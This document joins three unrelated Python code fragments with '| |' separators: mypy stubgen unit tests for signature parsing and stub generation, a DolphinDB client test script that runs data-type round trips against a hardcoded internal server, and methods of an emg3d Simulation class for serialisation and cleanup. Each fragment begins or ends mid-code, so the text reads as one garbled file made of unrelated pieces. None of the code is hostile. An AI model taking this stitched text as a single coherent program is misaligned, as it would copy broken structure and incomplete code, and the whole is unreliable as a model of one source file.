def make_file(self, *path: str, content: str = '') -> None:
file = os.path.join(*path)
with open(file, 'w') as f:
f.write(content)
class StubgenCliParseSuite(Suite):
def test_walk_packages(self) -> None:
assert_equal(
set(walk_packages(["mypy.errors"])),
{"mypy.errors"})
assert_equal(
set(walk_packages(["mypy.errors", "mypy.stubgen"])),
{"mypy.errors", "mypy.stubgen"})
all_mypy_packages = set(walk_packages(["mypy"]))
self.assertTrue(all_mypy_packages.issuperset({
"mypy",
"mypy.errors",
"mypy.stubgen",
"mypy.test",
"mypy.test.helpers",
}))
class StubgenUtilSuite(Suite):
def test_parse_signature(self) -> None:
self.assert_parse_signature('func()', ('func', [], []))
def test_parse_signature_with_args(self) -> None:
self.assert_parse_signature('func(arg)', ('func', ['arg'], []))
self.assert_parse_signature('do(arg, arg2)', ('do', ['arg', 'arg2'], []))
def test_parse_signature_with_optional_args(self) -> None:
self.assert_parse_signature('func([arg])', ('func', [], ['arg']))
self.assert_parse_signature('func(arg[, arg2])', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func([arg[, arg2]])', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_default_arg(self) -> None:
self.assert_parse_signature('func(arg=None)', ('func', [], ['arg']))
self.assert_parse_signature('func(arg, arg2=None)', ('func', ['arg'], ['arg2']))
self.assert_parse_signature('func(arg=1, arg2="")', ('func', [], ['arg', 'arg2']))
def test_parse_signature_with_qualified_function(self) -> None:
self.assert_parse_signature('ClassName.func(arg)', ('func', ['arg'], []))
def test_parse_signature_with_kw_only_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *, arg2=1)',
('func', ['arg', '*'], ['arg2']))
def test_parse_signature_with_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, *args)',
('func', ['arg', '*args'], []))
def test_parse_signature_with_star_star_arg(self) -> None:
self.assert_parse_signature('ClassName.func(arg, **args)',
('func', ['arg', '**args'], []))
def assert_parse_signature(self, sig: str, result: Tuple[str, List[str], List[str]]) -> None:
assert_equal(parse_signature(sig), result)
def test_build_signature(self) -> None:
assert_equal(build_signature([], []), '()')
assert_equal(build_signature(['arg'], []), '(arg)')
assert_equal(build_signature(['arg', 'arg2'], []), '(arg, arg2)')
assert_equal(build_signature(['arg'], ['arg2']), '(arg, arg2=...)')
assert_equal(build_signature(['arg'], ['arg2', '**x']), '(arg, arg2=..., **x)')
def test_parse_all_signatures(self) -> None:
assert_equal(parse_all_signatures(['random text',
'.. function:: fn(arg',
'.. function:: fn()',
' .. method:: fn2(arg)']),
([('fn', '()'),
('fn2', '(arg)')], []))
def test_find_unique_signatures(self) -> None:
assert_equal(find_unique_signatures(
[('func', '()'),
('func', '()'),
('func2', '()'),
('func2', '(arg)'),
('func3', '(arg, arg2)')]),
[('func', '()'),
('func3', '(arg, arg2)')])
def test_infer_sig_from_docstring(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x) - y', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x')], ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=None)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=3)', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x, Y_a=[1, 2, 3])', 'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x'), ArgSig(name='Y_a', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nafunc(x) - y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x, y', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x=z(y))', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc x', 'func'), [])
# Try to infer signature from type annotation.
assert_equal(infer_sig_from_docstring('\nfunc(x: int)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: int=3) -> int \n', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='int', default=True)],
ret_type='int')])
assert_equal(infer_sig_from_docstring('\nfunc(x: Tuple[int, str]) -> str', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='Tuple[int,str]')],
ret_type='str')])
assert_equal(
infer_sig_from_docstring('\nfunc(x: Tuple[int, Tuple[str, int], str], y: int) -> str',
'func'),
[FunctionSig(name='func',
args=[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]'),
ArgSig(name='y', type='int')],
ret_type='str')])
assert_equal(infer_sig_from_docstring('\nfunc(x: foo.bar)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='foo.bar')],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: list=[1,2,[3,4]])', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='list', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="nasty[")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc[(x: foo.bar, invalid]', 'func'), [])
assert_equal(infer_sig_from_docstring('\nfunc(x: invalid::type<with_template>)', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type=None)],
ret_type='Any')])
assert_equal(infer_sig_from_docstring('\nfunc(x: str="")', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x', type='str', default=True)],
ret_type='Any')])
def test_infer_sig_from_docstring_duplicate_args(self) -> None:
assert_equal(infer_sig_from_docstring('\nfunc(x, x) -> str\nfunc(x, y) -> int', 'func'),
[FunctionSig(name='func', args=[ArgSig(name='x'), ArgSig(name='y')],
ret_type='int')])
def test_infer_arg_sig_from_docstring(self) -> None:
assert_equal(infer_arg_sig_from_docstring("(*args, **kwargs)"),
[ArgSig(name='*args'), ArgSig(name='**kwargs')])
assert_equal(
infer_arg_sig_from_docstring(
"(x: Tuple[int, Tuple[str, int], str]=(1, ('a', 2), 'y'), y: int=4)"),
[ArgSig(name='x', type='Tuple[int,Tuple[str,int],str]', default=True),
ArgSig(name='y', type='int', default=True)])
def test_infer_prop_type_from_docstring(self) -> None:
assert_equal(infer_prop_type_from_docstring('str: A string.'), 'str')
assert_equal(infer_prop_type_from_docstring('Optional[int]: An int.'), 'Optional[int]')
assert_equal(infer_prop_type_from_docstring('Tuple[int, int]: A tuple.'),
'Tuple[int, int]')
assert_equal(infer_prop_type_from_docstring('\nstr: A string.'), None)
class StubgenPythonSuite(DataSuite):
required_out_section = True
base_path = '.'
files = ['stubgen.test']
def run_case(self, testcase: DataDrivenTestCase) -> None:
extra = []
mods = []
source = '\n'.join(testcase.input)
for file, content in testcase.files + [('./main.py', source)]:
mod = os.path.basename(file)[:-3]
mods.append(mod)
extra.extend(['-m', mod])
with open(file, 'w') as f:
f.write(content)
options = self.parse_flags(source, extra)
out_dir = 'out'
try:
try:
if not testcase.name.endswith('_import'):
options.no_import = True
if not testcase.name.endswith('_semanal'):
options.parse_only = True
generate_stubs(options, quiet=True, add_header=False)
a = [] # type: List[str]
self.add_file(os.path.join(out_dir, 'main.pyi'), a)
except CompileError as e:
a = e.messages
assert_string_arrays_equal(testcase.output, a,
'Invalid output ({}, line {})'.format(
testcase.file, testcase.line))
finally:
for mod in mods:
if mod in sys.modules:
del sys.modules[mod]
shutil.rmtree(out_dir)
def parse_flags(self, program_text: str, extra: List[str]) -> Options:
flags = re.search('# flags: (.*)$', program_text, flags=re.MULTILINE)
if flags:
flag_list = flags.group(1).split()
else:
flag_list = []
return parse_options(flag_list + extra)
def add_file(self, path: str, result: List[str]) -> None:
with open(path, encoding='utf8') as file:
result.extend(file.read().splitlines())
class StubgencSuite(Suite):
def test_infer_hash_sig(self) -> None:
assert_equal(infer_method_sig('__hash__'), [])
def test_infer_getitem_sig(self) -> None:
assert_equal(infer_method_sig('__getitem__'), [ArgSig(name='index')])
def test_infer_setitem_sig(self) -> None:
assert_equal(infer_method_sig('__setitem__'),
[ArgSig(name='index'), ArgSig(name='object')])
def test_infer_binary_op_sig(self) -> None:
for op in ('eq', 'ne', 'lt', 'le', 'gt', 'ge',
'add', 'radd', 'sub', 'rsub', 'mul', 'rmul'):
assert_equal(infer_method_sig('__%s__' % op), [ArgSig(name='other')])
def test_infer_unary_op_sig(self) -> None:
for op in ('neg', 'pos'):
assert_equal(infer_method_sig('__%s__' % op), [])
def test_generate_c_type_stub_no_crash_for_object(self) -> None:
output = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
imports = [] # type: List[str]
generate_c_type_stub(mod, 'alias', object, output, imports)
assert_equal(imports, [])
assert_equal(output[0], 'class alias:')
def test_generate_c_type_stub_variable_type_annotation(self) -> None:
# This class mimics the stubgen unit test 'testClassVariable'
class TestClassVariableCls:
x = 1
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '') # any module is fine
generate_c_type_stub(mod, 'C', TestClassVariableCls, output, imports)
assert_equal(imports, [])
assert_equal(output, ['class C:', ' x: Any = ...'])
def test_generate_c_type_inheritance(self) -> None:
class TestClass(KeyError):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module, ')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(KeyError): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_same_module(self) -> None:
class TestBaseClass:
pass
class TestClass(TestBaseClass):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestBaseClass.__module__, '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(TestBaseClass): ...', ])
assert_equal(imports, [])
def test_generate_c_type_inheritance_other_module(self) -> None:
import argparse
class TestClass(argparse.Action):
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('module', '')
generate_c_type_stub(mod, 'C', TestClass, output, imports)
assert_equal(output, ['class C(argparse.Action): ...', ])
assert_equal(imports, ['import argparse'])
def test_generate_c_type_with_docstring(self) -> None:
class TestClass:
def test(self, arg0: str) -> None:
"""
test(self: TestClass, arg0: int)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: int) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_type_with_docstring_empty_default(self) -> None:
class TestClass:
def test(self, arg0: str = "") -> None:
"""
test(self: TestClass, arg0: str = "")
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(TestClass.__module__, '')
generate_c_function_stub(mod, 'test', TestClass.test, output, imports,
self_var='self', class_name='TestClass')
assert_equal(output, ['def test(self, arg0: str = ...) -> Any: ...'])
assert_equal(imports, [])
def test_generate_c_function_other_module_arg(self) -> None:
"""Test that if argument references type from other module, module will be imported."""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType(self.__module__, '')
generate_c_function_stub(mod, 'test', test, output, imports)
assert_equal(output, ['def test(arg0: argparse.Action) -> Any: ...'])
assert_equal(imports, ['import argparse'])
def test_generate_c_function_same_module_arg(self) -> None:
"""Test that if argument references type from same module but using full path, no module
will be imported, and type specification will be striped to local reference.
"""
# Provide different type in python spec than in docstring to make sure, that docstring
# information is used.
def test(arg0: str) -> None:
"""
test(arg0: argparse.Action)
"""
pass
output = [] # type: List[str]
imports = [] # type: List[str]
mod = ModuleType('argparse', '')
| |
<gh_stars>1-10
import sys
sys.path.append('..')
import dolphindb as ddb
import numpy as np
from datetime import datetime
from dolphindb import session
from dolphindb import *
# from xxdb_server import HOST, PORT
HOST = "172.16.95.128"
PORT = 8921
if __name__ == '__main__':
conn = ddb.session()
success = conn.connect(HOST, PORT)
id = 1;
if success:
# print("hello")
print("---------------------------------------------------",id)
id += 1
print("Testing double Vector")
timeStart = datetime.now()
vc = conn.run('rand(1000.0,10000)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds/1000))
print(len(vc),vc)
print("---------------------------------------------------", id)
id += 1
print("Testing String Vector")
timeStart = datetime.now()
vc = conn.run('rand(`IBM`MSFT`GOOG`BIDU,10000)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(len(vc),vc)
print("---------------------------------------------------", id)
id += 1
print("Testing Dictionary")
timeStart = datetime.now()
vc = conn.run('dict(1 2 3, `IBM`MSFT`GOOG)')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print ("Testing matrix")
timeStart = datetime.now()
matrix, rowlabels, colLables = conn.run('1..6$3:2')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(matrix)
print("---------------------------------------------------", id)
id += 1
print("Testing table")
timeStart = datetime.now()
table_str = "n=20000\n"
table_str += "syms=`IBM`C`MS`MSFT`JPM`ORCL`BIDU`SOHU`GE`EBAY`GOOG`FORD`GS`PEP`USO`GLD`GDX`EEM`FXI`SLV`SINA`BAC`AAPL`PALL`YHOO`KOH`TSLA`CS`CISO`SUN\n"
table_str += "t1=table(2016.08.09 09:30:00.000+rand(18000,n) as timestamp,rand(syms,n) as sym,100*(1+rand(100,n)) as qty,5.0+rand(100.0,n) as price);\n"
table_str += "select sym,qty,price from t1 where price>9"
df = conn.run(table_str)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(df)
print("---------------------------------------------------", id)
id += 1
print("Testing function add integer")
timeStart = datetime.now()
vc = conn.run('add',1334,-334)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sub float")
timeStart = datetime.now()
vc = conn.run('sub', 97.62, -32.38)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function add string")
timeStart = datetime.now()
vc = conn.run('add', 'add', 'string')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum list float")
timeStart = datetime.now()
vc = conn.run('sum', [1.0, 2.0, 3.0])
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function dict keys")
timeStart = datetime.now()
vc = conn.run('keys', {"ibm":100.0, "ms":120.0, "c": 130.0})
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function dict values")
timeStart = datetime.now()
vc = conn.run('values', {"ibm":100.0, "ms":120.0, "c": 130.0})
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array int32 ")
timeStart = datetime.now()
vc = conn.run("sum", np.array([100000, 200000, 300000]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array int64 ")
timeStart = datetime.now()
vc = conn.run("sum", np.int64([1e15, 2e15, 3e15]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array float64 ")
timeStart = datetime.now()
vc = conn.run("sum", np.array([100000.0, 200000.0, 300000.0]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function sum numpy array bool ")
timeStart = datetime.now()
vc = conn.run("sum", np.bool_([True, False, True, False]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function reverse str vector")
timeStart = datetime.now()
vc = conn.run("reverse", np.array(["1", "2", "3"],dtype="str"))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function user defined function")
timeStart = datetime.now()
conn.run("def f(a,b) {return a+b};")
vc = conn.run("f", 1, 2.0)
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function flatten int matrix")
timeStart = datetime.now()
vc = conn.run("flatten", np.int32([[1, 2, 3], [4, 5, 6]]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function flatten double matrix")
timeStart = datetime.now()
vc = conn.run("flatten", np.double([[1, 2, 3], [4.0, 5.0, 6.0]]))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print ("Testing matrix upload")
timeStart = datetime.now()
(a, _, _) = conn.run("cross(+, 1..5, 1..5)")
(b, _, _) = conn.run("1..25$5:5")
nameObjectDict = {'a':a, 'b':b}
conn.upload(nameObjectDict)
(vc, _, _) =conn.run("a+b")
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test set read")
timeStart =datetime.now()
vc = conn.run('set([5, 5, 3, 4])')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test set upload")
timeStart = datetime.now()
x = {5, 5, 4, 3}
y = {8, 9, 9, 4, 6}
nameObjectDict = {'x': x, 'y': y}
conn.upload(nameObjectDict)
vc = conn.run('x | y')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test pair read")
timeStart = datetime.now()
vc = conn.run('3:4')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing function cast double matrix")
timeStart = datetime.now()
x = np.double([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]])
vc = conn.run("cast", np.double([[1.0, 2.0, 3.0], [4.0, 5.0, 6.0]]), ddb.Pair(2,3))
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc[0])
print("---------------------------------------------------",id)
id += 1
print("Test any vector")
timeStart = datetime.now()
x = [1, 2, "a", 'b']
conn.upload({'x': x})
vc = conn.run('x[1:3]')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('2012.10.01')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('1904.02.29')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("Testing Date scalar")
timeStart = datetime.now()
vc = conn.run('1904.01.01 + 365')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test date vector read/upload/read")
timeStart = datetime.now()
dates = conn.run('2012.10.01 + rand(1000,1000)')
tmp = dates
conn.upload({'dates': np.array(list(dates))})
vc = conn.run('dates')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(dates))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test month vector read/upload/read")
timeStart = datetime.now()
months = conn.run('2012.01M+rand(11,10)')
conn.upload({'months': list(months)})
vc = conn.run('months')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(months)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test time vector read/upload/read")
timeStart = datetime.now()
times = conn.run('12:32:56.356 + (rand(1000000,10))')
conn.upload({'times': np.array(list(times))})
vc = conn.run('times')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(times))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test nanotime vector read/upload/read")
timeStart = datetime.now()
times = conn.run('12:32:56.356000000 + (rand(1000000,10))')
conn.upload({'times': np.array(list(times))})
vc = conn.run('times')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(list(times))
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test minute vector read/upload/read")
timeStart = datetime.now()
minutes = conn.run('12:30m+rand(100,10)')
conn.upload({'minutes': np.array(list(minutes))})
vc = conn.run('minutes')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(minutes)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test second vector read/upload/read")
timeStart = datetime.now()
seconds = conn.run('12:56:38+rand(1000,10)')
conn.upload({'seconds': np.array(list(seconds))})
vc = conn.run('seconds')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(seconds)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test datetime vector read/upload/read")
timeStart = datetime.now()
datetimes = conn.run('2012.10.01T15:00:04 + rand(10000,10)')
conn.upload({'datetimes': np.array(list(datetimes))})
vc = conn.run('datetimes')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(datetimes)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test Timestamp scalar read/upload/read")
timeStart = datetime.now()
timeStamp = conn.run('2012.10.01T15:00:04.008')
conn.upload({'timeStamp':timeStamp})
vc = conn.run('timeStamp')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(timeStamp)
print(vc)
print("---------------------------------------------------", id)
id += 1
print("Test timeStamp vector read/upload/read")
timeStart = datetime.now()
timeStamps = conn.run('2012.10.01T15:00:04.008 + rand(10000,10)')
conn.upload({'timeStamps': np.array(list(timeStamps))})
vc = conn.run('timeStamps')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(timeStamps)
print(list(vc))
print("---------------------------------------------------", id)
id += 1
print("Test NanoTimestamp scalar read/upload/read")
timeStart = datetime.now()
nanoTimeStamp = conn.run('2012.10.01T15:00:04.008567123')
conn.upload({'nanoTimeStamp': nanoTimeStamp})
vc = conn.run('nanoTimeStamp')
print("running time (in millisecond): " + str((datetime.now() - timeStart).microseconds / 1000))
print(nanoTimeStamp)
print(vc)
print("---------------------------------------------------", id)
| |
{bar} {n_fmt}/{total_fmt} [{elapsed}]'},
**tqdm_opts,
}
# Ensure no kwargs left.
if kwargs:
raise TypeError(f"Unexpected **kwargs: {list(kwargs.keys())}.")
# Check the grid if one was explicitly provided.
if gridding == 'same':
meshes.check_mesh(self.model.grid)
elif gridding == 'input':
meshes.check_mesh(self._grid_single)
def __repr__(self):
"""Simple representation."""
name = f" «{self.name}»" if self.name else ""
info = f"{self.info}\n" if self.info else ""
survey = f" «{self.survey.name}»" if self.survey.name else ""
return (f":: {self.__class__.__name__}{name} ::\n{info}\n"
f"- {self.survey.__class__.__name__}{survey}: "
f"{self.survey.shape[0]} sources; "
f"{self.survey.shape[1]} receivers; "
f"{self.survey.shape[2]} frequencies\n"
f"- {self.model.__repr__()}\n"
f"- Gridding: {self._gridding_descr[self.gridding]}; "
f"{self._info_grids}")
def _repr_html_(self):
"""HTML representation."""
name = f" «{self.name}»" if self.name else ""
info = f"{self.info}<br>" if self.info else ""
survey = f" «{self.survey.name}»" if self.survey.name else ""
return (f"<h3>{self.__class__.__name__}{name}</h3>{info}"
f"<ul>"
f" <li>{self.survey.__class__.__name__}{survey}:"
f" {self.survey.shape[0]} sources;"
f" {self.survey.shape[1]} receivers;"
f" {self.survey.shape[2]} frequencies</li>"
f" <li>{self.model.__repr__()}</li>"
f" <li>Gridding: {self._gridding_descr[self.gridding]}; "
f" {self._info_grids}</li>"
f"</ul>")
def clean(self, what='computed'):
"""Clean part of the data base.
Parameters
----------
what : str, default: 'computed'
What to clean. Possibilities:
- ``'computed'``:
Removes all computed properties: electric and magnetic fields and
responses at receiver locations.
- ``'keepresults'``:
Removes everything except for the responses at receiver
locations.
- ``'all'``:
Removes everything (leaves it plain as initiated).
"""
if what not in ['computed', 'keepresults', 'all']:
raise TypeError(f"Unrecognized `what`: {what}.")
# Clean grid/model-dicts.
if what in ['keepresults', 'all']:
# These exist always and have to be initiated.
for name in ['_dict_grid', ]:
delattr(self, name)
setattr(self, name, self._dict_initiate)
# Clean field-dicts.
if what in ['computed', 'keepresults', 'all']:
# These exist always and have to be initiated.
for name in ['_dict_efield', '_dict_efield_info']:
delattr(self, name)
setattr(self, name, self._dict_initiate)
# These only exist with gradient; don't initiate them.
for name in ['_dict_bfield', '_dict_bfield_info']:
if hasattr(self, name):
delattr(self, name)
# Remove files if they exist.
if self.file_dir:
for p in Path(self.file_dir).glob('[ebg]field_*.h5'):
p.unlink()
# Clean data.
if what in ['computed', 'all']:
for key in ['residual', 'weight']:
if key in self.data.keys():
del self.data[key]
self.data['synthetic'] = self.data.observed.copy(
data=np.full(self.survey.shape, np.nan+1j*np.nan))
for name in ['_gradient', '_misfit']:
delattr(self, name)
setattr(self, name, None)
def copy(self, what='computed'):
"""Return a copy of the Simulation.
See ``to_file`` for more information regarding ``what``.
"""
return self.from_dict(self.to_dict(what, True))
def to_dict(self, what='computed', copy=False):
"""Store the necessary information of the Simulation in a dict.
See `to_file` for more information regarding `what`.
"""
# If to_dict is called from to_file, it has a _what_to_file attribute.
if hasattr(self, '_what_to_file'):
what = self._what_to_file
delattr(self, '_what_to_file')
if what not in ['computed', 'results', 'all', 'plain']:
raise TypeError(f"Unrecognized `what`: {what}.")
# Initiate dict with input parameters.
out = {
'__class__': self.__class__.__name__,
'survey': self.survey.to_dict(),
'model': self.model.to_dict(),
'max_workers': self.max_workers,
'gridding': self.gridding,
'gridding_opts': self.gridding_opts,
'solver_opts': self.solver_opts,
'verb': self.verb,
'name': self.name,
'info': self.info,
'tqdm_opts': self._tqdm_opts,
'receiver_interpolation': self.receiver_interpolation,
'file_dir': self.file_dir,
'_input_sc2': self._input_sc2,
}
# Clean unwanted data if plain.
if what == 'plain':
for key in ['synthetic', 'residual', 'weights']:
if key in out['survey']['data'].keys():
del out['survey']['data'][key]
# Store wanted dicts.
if what in ['computed', 'all']:
for name in ['_dict_grid',
'_dict_efield', '_dict_efield_info',
'_dict_bfield', '_dict_bfield_info']:
if hasattr(self, name):
out[name] = getattr(self, name)
# Store gradient and misfit.
if what in ['computed', 'results', 'all']:
out['gradient'] = self._gradient
out['misfit'] = self._misfit
if copy:
return deepcopy(out)
else:
return out
@classmethod
def from_dict(cls, inp):
"""Convert dict into :class:`emg3d.simulations.Simulation` instance.
Parameters
----------
inp : dict
Dictionary as obtained from
:func:`emg3d.simulations.Simulation.to_dict`.
Returns
-------
simulation : Simulation
A :class:`emg3d.simulations.Simulation` instance.
"""
inp = {k: v for k, v in inp.items() if k != '__class__'}
# Get all class-inputs.
inp_names = ['survey', 'model', 'max_workers', 'gridding',
'solver_opts', 'verb', 'name', 'info']
cls_inp = {k: inp.pop(k) for k in inp_names}
cls_inp['gridding_opts'] = inp.pop('gridding_opts', {})
cls_inp['survey'] = surveys.Survey.from_dict(cls_inp['survey'])
cls_inp['model'] = models.Model.from_dict(cls_inp['model'])
input_sc2 = inp.pop('_input_sc2', False)
if input_sc2:
cls_inp['_input_sc2'] = input_sc2
cls_inp['receiver_interpolation'] = inp.pop(
'receiver_interpolation', 'cubic')
cls_inp['file_dir'] = inp.pop('file_dir', None)
cls_inp['tqdm_opts'] = inp.pop('tqdm_opts', {})
# Instantiate the class.
out = cls(**cls_inp)
# Add existing derived/computed properties.
data = ['_dict_grid',
'_dict_efield', '_dict_efield_info',
'_dict_bfield', '_dict_bfield_info']
for name in data:
if name in inp.keys():
values = inp.pop(name)
# De-serialize Model, Field, and TensorMesh instances.
io._dict_deserialize(values)
setattr(out, name, values)
# Add gradient and misfit.
data = ['gradient', 'misfit']
for name in data:
if name in inp.keys():
setattr(out, '_'+name, inp.pop(name))
return out
def to_file(self, fname, what='computed', name='simulation', **kwargs):
"""Store Simulation to a file.
Parameters
----------
fname : str
Absolute or relative file name including ending, which defines the
used data format. See :func:`emg3d.io.save` for the options.
what : str, default: 'computed'
What to store. Possibilities:
- ``'computed'``, ``'all'``:
Stores all computed properties: electric fields and responses at
receiver locations.
- '``results'``:
Stores only the response at receiver locations.
- ``'plain'``:
Only stores the plain Simulation (as initiated).
Note that if ``file_dir`` is set, those files will remain there.
name : str, default: 'simulation'
Name with which the simulation is stored in the file.
kwargs : Keyword arguments, optional
Passed through to :func:`emg3d.io.save`.
"""
# Add what to self, will be removed in to_dict.
self._what_to_file = what
# Add simulation to dict.
kwargs[name] = self
# If verb is not defined, use verbosity of simulation.
kwargs['verb'] = kwargs.get('verb', self.verb)
return io.save(fname, **kwargs)
@classmethod
def from_file(cls, fname, name='simulation', **kwargs):
"""Load Simulation from a file.
Parameters
----------
fname : str
Absolute or relative file name including extension.
name : str, default: 'simulation'
